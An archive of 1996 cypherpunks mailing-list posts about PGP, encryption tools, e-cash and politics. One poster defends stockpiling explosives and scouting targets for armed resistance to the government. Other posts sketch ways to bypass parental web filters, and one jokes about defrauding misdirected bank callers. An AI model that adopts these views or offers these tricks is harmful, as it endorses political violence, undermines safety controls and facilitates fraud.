Message-ID: <19960704.101434.10126.21.KYLEB@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


    Hello,
Does anyone have the latest version of PGP for Windows and/or DOS
If so please reply directly,  since I am not yet on C'Punks.


                                                         Thanks,
                                                            
KyleB@juno.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 5 Jul 1996 06:42:21 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: The Net and Terrorism
Message-ID: <199607041917.MAA05137@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:43 PM 7/4/96 +0000, Deranged Mutant wrote:
>On  3 Jul 96 at 14:48, jim bell wrote:
>[..]
>> But as I've pointed out elsewhere, there's a big difference between "We're 
>> gonna do this!" and "Someday we may have to do this."    My impression is 
>> that the government has tried to completely erase the dividing line
>> between these two concepts.
>
>As far as the government is concerned, "gonna do this" and "may have 
>to do this" is the same, since the "this" is illegal.  There is no 
>dividing line. 

A couple of decades ago, a relative of mine was in the Army Reserve.  Every 
summer, they went on exercises, and in one particular exercise (this is 
probably true of all of them, as well), they invented some sort of fictional 
scenario in which America was bordered by two fictional countries, the one 
to the south was called "Taco Land" and the one to the north was called "Big 
Tree Land."  I complimented him on the Army's ability to hide the meanings 
of these fictions so well!  B^)

Naturally, the Reserve went out and set up camp, etc, and did everything an 
army was supposed to do under such exercises.

So why were they allowed to do this, while ordinary citizens weren't?  Now, 
you may respond, "Hey, they're the Army, that's their job and they're 
allowed!"  Maybe.  But then again, as "ordinary citizens" we have a job to 
do as well.  And part of that job may involve ensuring that if the 
government stops being limited to the strictures of the Constitution, they 
can take it down and replace it with something better.  (See Declaration of 
Independence, for example.)


Frankly, nothing of what I've heard that this Arizona group did ought to be 
illegal.  I interpret the 2nd amendment ("arms") to include the dictionary 
meaning, "objects used as weapons," so I don't see any legitimate 
restriction of explosives.  As for scouting, practicing, and making 
possible-but-not-certain plans, I see nothing wrong with this either.  
(Remember, the Army has plenty of plans, too... few of which ever are 
carried out.)


>I suspect that since they (alegedly) had specific targets
>planned it leaned closer to the "gonna do this". 

Then, unfortunately, your "logic" is atrocious.  If you see a likely enemy, 
it makes sense to identify his assets well in advance of any actual 
hostilities, even if those hostilities are not certain. (to fail to do so 
would be completely irresponsible.)   That's what these people appear to 
have done.

> From the minimal discussion in the media I have read,
^          ^^^^^^^^^^^^^^^^^^

That's a CLUE.  The reason there's been "minimal discussion" is because the 
lap-dog media wants to avoid the entire "we're gonna do this/someday we may 
have to do this" issue.   It's not that they want to put the dividing line 
in a slightly different location, they want to deny that there is ANY SORT 
of a dividing line at all!  For the media to acknowledge that the people 
have a RIGHT to simply collect weapons of all kinds, including explosives, 
for a potential future confrontation with the government would, then, 
require debate as to how far this could go.  I think that would lead to the 
logical conclusion is that no action is illegal short of actually engaging 
in an attack.


> it appeared to be another 
>'revenge for waco and ruby ridge' action rather than a 'defense of 
>civil liberties from a potential totalitarian government' action.

I don't really see any valid distinction, here, except in _time_.


> (I'm rather skeptical as to how blowing up a specific IRS office would
>be effective were the government to change into a totalitarian regime.)
>
>Rob.

Local people can be expected to act locally.  They'll take care of their 
part of town, you take care of yours, right?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 5 Jul 1996 03:31:33 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
Message-ID: <199607041655.MAA00784@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Jul 96 at 18:58, Mark M. wrote:
[..]
> If the child is creative enough, he will be able to boot DOS from a bootdisk
> and remove the line from config.sys that starts up the filtering software.

Who bother using a boot disk. Remove it from the config.sys and then 
reboot.  

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 5 Jul 1996 03:33:08 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: The Net and Terrorism
Message-ID: <199607041655.MAA00793@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Jul 96 at 14:48, jim bell wrote:
[..]
> But as I've pointed out elsewhere, there's a big difference between "We're 
> gonna do this!" and "Someday we may have to do this."    My impression is 
> that the government has tried to completely erase the dividing line
> between these two concepts.

As far as the government is concerned, "gonna do this" and "may have 
to do this" is the same, since the "this" is illegal.  There is no 
dividing line. I suspect that since they (alegedly) had specific targets
planned it leaned closer to the "gonna do this".  From the minimal 
discussion in the media I have read, it appeared to be another 
'revenge for waco and ruby ridge' action rather than a 'defense of 
civil liberties from a potential totalitarian government' action.
 (I'm rather skeptical as to how blowing up a specific IRS office would
be effective were the government to change into a totalitarian regime.)

Rob.



 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 5 Jul 1996 03:37:38 +0800
To: cypherpunks@toad.com
Subject: Lack of PGP sigs
Message-ID: <199607041655.MAA00788@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Another minor problem is when PGP-sigs are made
using something other than MD5 as a hash algorithm,
at least until certain modifications of PGP become
'standardized' until PGPlib is released.

Rob.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3b
Charset: cp850
Comment: SHA1 is used instead of MD5 for this signature

iQEVAwUBMdvzjwTNlSxdPy6ZAQIbRwf8DFyAdkQemj6z8nGb8MAkg9Hi0t9AZgpT
/7IaNy7x7+P1ahY5TRm0gZRaRr3A3scz4jCCP2IUbKnP/3SnVsvWH/GuH2EnGzQQ
UhZODymDzaeWVhoQH0GNhDsAf3yLVyr6CQPWsP0aMDD4HBCFKDjr5ip9XsZRYCo1
P+7GbT+/oIRtztEFufguecIalfh275rT/FyDioblKxgyK+AX8hQ+3POzJgayPbc8
7AosgiFv9UGD4O4ComQyurZi/eFdn/x6NqrVKUVRK0KOWDVEYqAhDz45oP94//NQ
ahE8viIm6irCu6PS+yf62RZvZafXLccHCBG2rUOm6gYEsB3XtuM/Vg==
=SQBi
-----END PGP SIGNATURE-----
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 5 Jul 1996 03:45:03 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: What remains to be done.
Message-ID: <199607041710.NAA00995@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



Another need is for file/disk-encryption utilities.  I'm not familiar 
with what's out there for Macs, but for PCs there's SFS and ASPICRYP
for SCSI drives (with no source!) and SFS, SecureDrive and SecureDevice
for HD (or FD).  The latter won't work on Win95. AFAIK, SFS and 
SecureDrive aren't 100% friendly with Win95 either, though they'll work.

There's a need for something that will work under Win95, WinNT, 
and/or OS/2 for encrypting partitions.  Aside from a few commercial 
or shareware apps which use some variant of DES, there's little out there.
(One problem is that DD kits for Win95/NT and OS/2 cost $$$.)



Rob.


---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 4 Jul 1996 22:30:15 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Noise: Re: Those Evil Republicans
In-Reply-To: <9606262325.AA25647@Etna.ai.mit.edu>
Message-ID: <31DBA835.6EEA4806@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@Etna.ai.mit.edu wrote:
> 
> Jersey and the Isle of Man are not independent soverign nations. The
> Manx parliament is subordinate to the English Privy Council and Jersey
> is similarly an anachronism. Andora is ruled jointly by the French President
> and a Spanish Bishop (or is it the other way round?).

Andorra is a self governing sovereign nation - the French president and
Spanish bishop play only titular roles.

Regarding Jersey and the Isle of Man, I misunderstood the requirement for
the countries to be independant - we were after all discussing countries
which have no control over their currencies.  Still, there are many
non-independant countries that do not use the currency of the country
they are dependent on - for example Bermuda and BVI (both UK dependent)
use the US dollar.  Many of the Caribbean islands which are UK dependent
(eg. Anguilla) use East Caribbean dollars.

There are also several independent sovereign nations that have no control
over their own currency (eg. Liechtenstein (the one you mentioned), Andorra,
Monaco, Nauru, Marshall Islands, Micronesia and Pueto Rico).  One could
even argue that countries such as Cuba have relinquished control over
their own currency by tying their Peso to the US dollar (which is also
widely used in Cuba).  The same could perhaps be said of Luxembourg.

> Fogive my skepticism but I don't think that any ecconomist would seriously
> suggest these as usefull models for modern industrial societies. The chief
> industries being parasitic on those of larger nations.

First of all, "parasitic" is a very derogatory term to apply to these
nations.  They are no more parasitic than out of town supermarkets.

Second, you suggest Liechenstein as a useful model for a modern
industrial society that has no control over its currency, but then go
on to criticise Andorra as a useful model.  Why?

Third, you have missed the point I was making, that of Goodhearts law,
which loosely states that "attempts by the government to regulate or
tax one channel of banking business quickly lead to the same business
being conducted through a different channel which is untaxed or
unregulated".  Surely the fact that every large nation has its
banking tax havens (eg. UK has the Channel Islands, the US has the
Caribbean islands) is proof of this?


Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberEyes <cyberia@cam.org>
Date: Fri, 5 Jul 1996 05:04:12 +0800
To: cypherpunks@toad.com
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <1.5.4.16.19960703170027.5fc7bc80@arc.unm.edu>
Message-ID: <Pine.GSO.3.94.960704132902.29085B-100000@Stratus.CAM.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, David Rosoff wrote:

> I've wondered .. could a creative child circumvent these filter programs
> using a URL-redirecter, like where you see something like
> http://www.one.site.com/cgi-bin/rd?http://www.porno-site.com/
> or are they not URL-based?

	The child would also be able to use the Anonymizer at
http://www.anonymizer.com. But, is it that easy to redirect? Just type
that little rd command? What others are there? I've seen &lt and &gt in
use, what do they perform?

Ryan A. Rowe - Montreal, Quebec        /Seeking Internet-related job!/ 
aka CyberEyes, Rubik'S Cube              I will relocate _ANYWHERE_.

Tel. -> +1-514-626-0328                |                 __o         o
E-Mail -> cyberia@cam.org              |               _ \<_        <\
WWW -> http://www.cam.org/~cyberia     | __/\o_       (_)/(_)       />
IRC -> #CAli4NiA, #Triathlon, #Surfing |
FTP -> ftp.cam.org /users/cyberia      |  swim          bike       run

          Read my C.V. at http://www.cam.org/~cyberia/resume-e.html 
           "In lieu of experience, I have a willingness to learn."

             "Everyone has their day, mine is July 15th, 1998."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair" (Time Keeper) <fair@clock.org>
Date: Fri, 5 Jul 1996 04:48:27 +0800
To: gregmi@galileo.mis.net
Subject: Re: Word lists for passphrases
Message-ID: <v02140b3bae01b137a1c6@[199.43.99.154]>
MIME-Version: 1.0
Content-Type: text/plain


You could just snarf up a week's worth of netnews...

        Erik






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 5 Jul 1996 08:24:03 +0800
To: unicorn@schloss.li
Subject: Re:  What remains to be done.
Message-ID: <199607042102.OAA26752@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Black Unicorn <unicorn@schloss.li>
> A.  Methods to run secure websites on insecure servers.
> [...]
> A software solution which permits local decryption makes traffic analysis
> less useful, presents the opportunity to use front end and disposable www
> pages on domestic ISPs while imposing no liability on the ISP itself, and
> opens several more effective traffic analysis deterants.

I don't quite understand what is being proposed here.  If the
information on the web site is encrypted, who is supposed to be able to
decrypt it?  Just one person, or some select group of people?  My
concern is the difficulty of keeping keys secret if they are made
available to more than one or two people.

Once the keys are known to those who would oppose the publication of
the information they can go to the ISP just as easily as if the
information were not encrypted, and get them to take it down if it is
illegal.

It would seem that an equally effective method would be to use no
encryption, but just a secret URL, one which is not linked to from
elsewhere - an "island in the net", so to speak (apologies to Bruce
Sterling).

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 5 Jul 1996 04:54:39 +0800
To: cypherpunks@toad.com
Subject: Re: Net and Terrorism.
In-Reply-To: <ae013a2a030210040b66@[205.199.118.202]>
Message-ID: <41ZJqD67w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> Islam, notably, was known for this policy of conversion by the sword:
> entire national populations were given the choice of converting to Islam or
> being put to the sword. Most converted, naturally enough.

No, the population was given the choice of converting or becoming slaves.
(Slaves who opted to convert later didn't become free.) There were very
few examples of mass genocide during the moslem conquests, and generally
they avoided killing anyone who could be sold into slavery.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 5 Jul 1996 09:21:16 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Lack of PGP signatures
In-Reply-To: <Pine.LNX.3.93.960703230954.124G-100000@smoke.suba.com>
Message-ID: <Pine.LNX.3.94.960704140318.262A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 3 Jul 1996, snow wrote:

> On Wed, 3 Jul 1996, Alan Olsen wrote:
> > I am wondering why there is not a signing option that ignores all
> > non-printing characters.  Might fix some of these problems...  (Can anyone
> > think of a reason this would be a "Bad Thing(tm)"?)
> 
>      IANACE, but off the top of my head I'd say clear signing binaries. 

It is not possible to clear-sign binaries with PGP.  The point of clear-signing
is to have signed text that is readable to people who don't have the software
necessary to process the text.  It would make sense to clearsign a file that
is base64'ed or uuencoded, which wouldn't alter the contents of the file.  I
can't see how such an option would be harmful, except that it might lose some
characters that are important to the context of the message.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMdwIoLZc+sv5siulAQHVegQAqeyjQY9SmQ4mM1/ezBDeI9MLa3EZ8620
JXrbxYCt74zUFzqC8GxylUE9cowdZmDrQ2NbYepWbekoY/cmSE3lxJPd1VW36Lbo
NY3c1iNswvUiAsfXPUA+tBide/aZCk/vniHXFwLBPJi+gRTjktpbIUNixoxW3B5z
xJSFusVl8Lg=
=QUGA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberEyes <cyberia@cam.org>
Date: Fri, 5 Jul 1996 05:18:55 +0800
To: cypherpunks@toad.com
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <199607032025.QAA25327@apollo.gti.net>
Message-ID: <Pine.GSO.3.94.960704140708.29085H-100000@Stratus.CAM.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Mark Rogaski wrote:

> I would assume that the filters look for regexp's in the query string, too.
> How about a nice little Nutscape plugin that uses a rot13'd query string?

	Do you have a copy of that plugin? If it exists.

> http://www.one.site.com/cgi-bin/sneaky-rd?uggc://jjj.cbeab-fvgr.pbz/
> 
> Hmmm, no bad words in the query string.  Of course the filter package would
> start looking for rot13'd stuff in the next release.  So the next logical
> step is to use the URL encrypted with the redirector's public key ... or
> better yet, a dynamically generated key.  Just convert it to radix64 so
> as to avoid ?'s &'s or ='s, and use that as the query string.  
> 
> The plug-in would only be necessary to generate the first request.  Any
> URL preparation could be handled by passing the output of netcat through
> a stream filter before sending it to the client.

	That "creative child" would have to be pretty damn smart to do
what you described.

Ryan A. Rowe - Montreal, Quebec        /Seeking Internet-related job!/ 
aka CyberEyes, Rubik'S Cube              I will relocate _ANYWHERE_.

Tel. -> +1-514-626-0328                |                 __o         o
E-Mail -> cyberia@cam.org              |               _ \<_        <\
WWW -> http://www.cam.org/~cyberia     | __/\o_       (_)/(_)       />
IRC -> #CAli4NiA, #Triathlon, #Surfing |
FTP -> ftp.cam.org /users/cyberia      |  swim          bike       run

          Read my C.V. at http://www.cam.org/~cyberia/resume-e.html 
           "In lieu of experience, I have a willingness to learn."

             "Everyone has their day, mine is July 15th, 1998."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 4 Jul 1996 23:14:37 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What remains to be done.
In-Reply-To: <Pine.SUN.3.94.960703055812.13232A-100000@polaris>
Message-ID: <31DBB50A.5656AEC7@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> A.  Methods to run secure websites on insecure servers.
> 
> A thread on 'punks last month, I am of the view that local decryption of
> web pages is essential to the development of coercion free web pages.
> Estlablishing a truely secure web page today requires the server to be
> extra-terratorial, in a secure physical location, and requires such
> lengths to defeat traffic analysis (which lengths must be applied to the
> actual network logistics, rather than the software logistics) so as to be
> impractical to all but institutional resources.  The best effort I have
> seen is in European Union Bank (www.eub.com) or (www.eub.net) [neither of
> which I recommend you use for deposits] and it still falls quite short.
> 
> A software solution which permits local decryption makes traffic analysis
> less useful, presents the opportunity to use front end and disposable www
> pages on domestic ISPs while imposing no liability on the ISP itself, and
> opens several more effective traffic analysis deterants.
> 
> Ideally, both web proxies (for servers as well as clients) and local
> decryption will be written allowing both server and user a degree of
> double blind operation as well as easy disposability of front ends.
> 
> A Netscape plugin for local decryption of web pages and proxy forwarding
> of WWW form submissions to the server is a MUST.

I fully agree with all of your comments, but, encrypted proxying issues
aside, what is wrong with SSL?  Is it because the encryption is for
the whole server, not individual users?

> Is anyone considering work on these?

I gave the encrypted proxy idea some thought, and intend to do
it one day.  If someone is willing to run it, then I will certainly
do it.  Offers?

With regard to the local decryption idea, then I don't see this as
much of a problem.  How much interest is there in this?  We already
have something similar running, but it would still need a bit of work
to make more general.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Fri, 5 Jul 1996 08:35:45 +0800
To: jimbell@pacifier.com
Subject: Re: ecash thoughts
Message-ID: <Pine.BSF.3.91.960704135836.188C-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> But probabilistic payment should be used to allow the minimum average
> payment to go way below this, perhaps to an unlimited extent. 

I just thought of an obvious problem with "probabilistic payments". 

Suppose someone is surfing the web or whatever, and various sites are 
charging, say, 0.1 cents per web page, via probabilistic payments. 
Suppose there is a 1 in 10 chance that the person will pay 1 cent.

The person wanders around the web, acting as though he's perfectly willing
to pay, and participating in the fair coin tosses. Except, he really has
no intention of paying. He will gain free access to 9 out of 10 sites, and
on the ones that he loses the 1/10 gamble, he just backs out of the deal
and doesn't pay anything. The end result is that instead of seeing all of
the web at 0.1 cents per page, he sees 90% of the web completely for 
free. If everyone does this, the sites will go broke.

It's the equivalent of welshing on a bet.

The obvious solution would be to require that the person pay the 1 cent,
then if he wins the 9/10 bet, he gets the 1 cent back. But that will just
move the problem from the user to the server- the site can welsh on the
bet and refuse to pay back the one cent. They will get ten times the
payment that they are supposed to get. 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberEyes <cyberia@cam.org>
Date: Fri, 5 Jul 1996 05:36:04 +0800
To: cypherpunks@toad.com
Subject: Re: ecash thoughts
In-Reply-To: <Pine.SUN.3.91.960703172059.5948A-100000@tipper.oit.unc.edu>
Message-ID: <Pine.GSO.3.94.960704142830.535A-100000@Stratus.CAM.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Simon Spero wrote:

> I'm currently visiting at my parents house in England, which for the past 
> 18 years has had a really nice phone number. Unfortunately, BT split 
> london into two area codes, and have reallocated the exchange number in 
> the other one to citibank. Unfortunately, not many of their customers can 
> quite cope with the concept of area-codes. Even more unfortunately, 
> neither can BT or citibanks telcom group- we've had calls transferred 
> from their switchboard straight through to us. 
> 
> Now, here comes the test for cp ingenuity - can you think of the best way 
> to answer the phone to someone who things they've called a bank?

	Act like a teller, get their banking information, then steal all
their money. er. Sure, it's bank fraud, but it's fun! :)

Ryan A. Rowe - Montreal, Quebec        /Seeking Internet-related job!/ 
aka CyberEyes, Rubik'S Cube              I will relocate _ANYWHERE_.

Tel. -> +1-514-626-0328                |                 __o         o
E-Mail -> cyberia@cam.org              |               _ \<_        <\
WWW -> http://www.cam.org/~cyberia     | __/\o_       (_)/(_)       />
IRC -> #CAli4NiA, #Triathlon, #Surfing |
FTP -> ftp.cam.org /users/cyberia      |  swim          bike       run

          Read my C.V. at http://www.cam.org/~cyberia/resume-e.html 
           "In lieu of experience, I have a willingness to learn."

             "Everyone has their day, mine is July 15th, 1998."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberEyes <cyberia@cam.org>
Date: Fri, 5 Jul 1996 05:25:35 +0800
To: cypherpunks@toad.com
Subject: Re: Computer-Aided Revolution
In-Reply-To: <199607032257.PAA16812@mail.pacifier.com>
Message-ID: <Pine.GSO.3.94.960704143450.535B-100000@Stratus.CAM.ORG>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, jim bell wrote:

> I've thought of an application for a "revolutionary" program for peaceful 
> protest, but one that requires that a substantial number (1000) of people 
> have access to computer time synchronized to 1 second, ideally 0.1 second.  
> How good would a time sync over the  net typically be?

	Probably not very good, considering lags, and other aspects. It's
possible however... 1000 people is a lot, though.

Ryan A. Rowe - Montreal, Quebec        /Seeking Internet-related job!/ 
aka CyberEyes, Rubik'S Cube              I will relocate _ANYWHERE_.

Tel. -> +1-514-626-0328                |                 __o         o
E-Mail -> cyberia@cam.org              |               _ \<_        <\
WWW -> http://www.cam.org/~cyberia     | __/\o_       (_)/(_)       />
IRC -> #CAli4NiA, #Triathlon, #Surfing |
FTP -> ftp.cam.org /users/cyberia      |  swim          bike       run

          Read my C.V. at http://www.cam.org/~cyberia/resume-e.html 
           "In lieu of experience, I have a willingness to learn."

             "Everyone has their day, mine is July 15th, 1998."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Fri, 5 Jul 1996 08:53:33 +0800
To: cypherpunks@toad.com
Subject: Announce: Private Idaho 2.7b
Message-ID: <199607042154.OAA06900@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Since I'm in an especially patriotic mood today, I've just uploaded the 2.7b
beta
release of Private Idaho (which started out life as a Windows PGP shell, but is
turning into the "mother of all privacy tools" shell).

Significant new additions include:

Automated install application - no more installing and updating new releases of 
PI by hand (many thanks to Colin Tan for writing the Setup application). The
install 
application comes bundled with PGP QuickStart, a utility for helping new users 
download and install PGP.
 
Expert and user modes - for new users, user mode provides a limited set of 
commonly used commands. Expert mode gives you access to all of the commands.
 
Steps - again, another feature for new users. Step-by-step information on
how to 
perform common tasks.
 
Change nym account reply blocks - easy way to change nym reply blocks.
 
Anonymizer support - support for C2's new anonymous Web browsing server. 
Select a URL from any text within Private Idaho and your browser will
anonymously 
access that Web page. 

Mixmaster support - support for Mixmaster type 2 remailers. 

Variable word-wrap length - select window size, 65, 70, or 75 character line
length. 

Revised online help 

HTML version of help

Get it at: http://www.eskimo.com/~joelm/pi.html

And while you're there, as an added 4th of July bonus, check out:

http://www.eskimo.com/~joelm/cryptbk.html

For the extremely tacky, and offensive to some, "Building a CryptoBook" page.

Comments, questions, etc. as usual to:

Joel McNamara
joelm@eskimo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>test921148@alpha.c2.org
Date: Fri, 5 Jul 1996 09:08:46 +0800
To: cypherpunks@toad.com
Subject: premail-0.44, WHERE DO I GET IT.
Message-ID: <199607042205.PAA24666@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Cpunks: I tried to find the perl script 
premail (v. 0.44) that is described at the 
Raph Levien's page. Unfortunately, EVERY 
place where it is purported to be is screwed up: 
ftp.csua.berkeley.edu does not respond to FTP commands, 
Levien's download page returns premail 0.43 instead of 0.44, 
and ftp.hacktic.nl does not have premail-0.44.

WHAT TO DO???
WHAT TO DO???
WHAT TO DO???




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 5 Jul 1996 08:23:38 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Net and Terrorism.
In-Reply-To: <41ZJqD67w165w@bwalk.dm.com>
Message-ID: <199607042108.QAA07984@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> 
> tcmay@got.net (Timothy C. May) writes:
> > Islam, notably, was known for this policy of conversion by the sword:
> > entire national populations were given the choice of converting to Islam or
> > being put to the sword. Most converted, naturally enough.
> 
> No, the population was given the choice of converting or becoming slaves.
> (Slaves who opted to convert later didn't become free.) There were very
> few examples of mass genocide during the moslem conquests, and generally
> they avoided killing anyone who could be sold into slavery.

Just curious how much slaves cost at that time. Would be interestnig 
to see a price of a good slave as compared to, say, average monthly 
earnings or a price of one sheep.


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 5 Jul 1996 10:17:53 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199607042317.QAA04006@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


::
Encrypted: PGP

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

hIkDPRWysueuweUBA+irExxkMlmCIvGqzCvDUNWtFWbAjJx4JODBCbauj6uYeC62
pF0r72wgDKrncK5Z/oZdF11vaVveW50KrZQQFVL2+etoRTHfLBNgKKYW4cDwTe/f
4jS3+tut2XfRf/y/Ho139zKfNIBdHC0ByHEsIcKU2FPwNzalERc3q+yehKYAAAHF
mFeehQHt3/AdVJOueBP+EzxG31y72enxE0lilm9VGzQzLf7sH2354xezhtxsrNgH
BEkF9o0EhYy6/3JHDhqcat0fwDBZsBPDH8Lg1m60xBMD8iTLtOT5jUNAQRUwahlf
s1acdgoSnx6PgTnHpox4r6SNxeIaC9AH1WTAngfrLvm877/gk5kxjIJV7D7Z7sF8
IQn9BXNPj1/6c9MyqAPQE7w3PpEFkN6/KPZsAhtyEc/ib4IxwMoRoVCRpOY13iVm
q1UGaOPsTaom13rCn35fFp71o+Myc+Due3OoTpCC01B95JucbhUMV2pyBdgcafbN
vnj/0FUAgWVDkAMWYuZj82qqoi8NWcNhXsBxsnXRBAxemgckmZdo+sx6sUlSLy9u
5JbN+7DNcwbfY5qbUJIVnPNu4BDuN+s9dCVSYalCVL/rGhFwkCvPSHJuFIZF7daE
H+uITFUp5D8kmlLj3zHdTaoXkctRA7xc2+JVlgEGAsLuBQ8SSOQQovmJIarmBdhJ
g2RiRaGv4CsaSbQiMfy5vAmDjbuJdrL+sYfDI4n4ODVSaBHkGjoOriU8T1kpwJCT
qFRDBgQGhMwGplT1FKULqn7D7SFh
=v5LU
-----END PGP MESSAGE-----
I didn't know L.Detweiler's first name was Larry.
How did you, tcmay?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregmi@galileo.mis.net (Greg Miller)
Date: Fri, 5 Jul 1996 02:27:36 +0800
To: cypherpunks@toad.com
Subject: Word lists for passphrases
Message-ID: <31dbf02b.66263803@pop.mis.net>
MIME-Version: 1.0
